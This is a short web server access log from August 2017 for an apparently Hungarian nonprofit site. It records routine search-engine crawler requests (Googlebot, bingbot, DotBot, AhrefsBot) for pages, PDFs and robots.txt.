66.249.65.128 - - [31/Aug/2017:00:45:24 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.159 - - [31/Aug/2017:00:45:24 +0200] "GET / HTTP/1.1" 200 1010 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.244.66.200 - - [31/Aug/2017:00:54:52 +0200] "GET /konferenciak/2konferencia/index.html HTTP/1.1" 200 7142 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
216.244.66.200 - - [31/Aug/2017:00:55:03 +0200] "GET /konferenciak/03konf/index.html HTTP/1.1" 200 13272 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
66.249.73.20 - - [31/Aug/2017:00:57:15 +0200] "GET /new/en/news HTTP/1.1" 200 8133 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.22 - - [31/Aug/2017:01:11:08 +0200] "GET /molnar.dbk.pdf HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.20 - - [31/Aug/2017:01:14:00 +0200] "GET /new/en/about_us/links HTTP/1.1" 200 7745 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.20 - - [31/Aug/2017:01:16:18 +0200] "GET /aktualis/onfoglalkoztatas/index.html HTTP/1.1" 200 77025 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.20 - - [31/Aug/2017:01:17:14 +0200] "GET /kutat/REVkutatas/3gazdalkodas/ HTTP/1.1" 200 88137 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.20 - - [31/Aug/2017:01:18:49 +0200] "GET /angol/followup/index.html HTTP/1.1" 200 9852 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.18 - - [31/Aug/2017:01:22:45 +0200] "GET /kutat/REVkutatas/2menedzsment/index.html HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
164.132.161.89 - - [31/Aug/2017:01:25:44 +0200] "GET /halozatok/JMCS/tagok/index.html HTTP/1.1" 200 65034 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)"
66.249.73.18 - - [31/Aug/2017:01:33:50 +0200] "GET /new/en/about_us/supporters HTTP/1.1" 200 7950 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.55.39.240 - - [31/Aug/2017:01:37:17 +0200] "GET /new/sites/default/files/bulgarian%20final.pdf HTTP/1.1" 200 509919 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
216.244.66.200 - - [31/Aug/2017:01:37:26 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
66.249.73.20 - - [31/Aug/2017:01:41:23 +0200] "GET /new/projektek/%C3%B6nk%C3%A9ntes-menedzsment-tr%C3%A9ning HTTP/1.1" 200 9398 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.130 - - [31/Aug/2017:02:01:11 +0200] "GET /aktualis/1gyikNCA/elektor/index.html HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
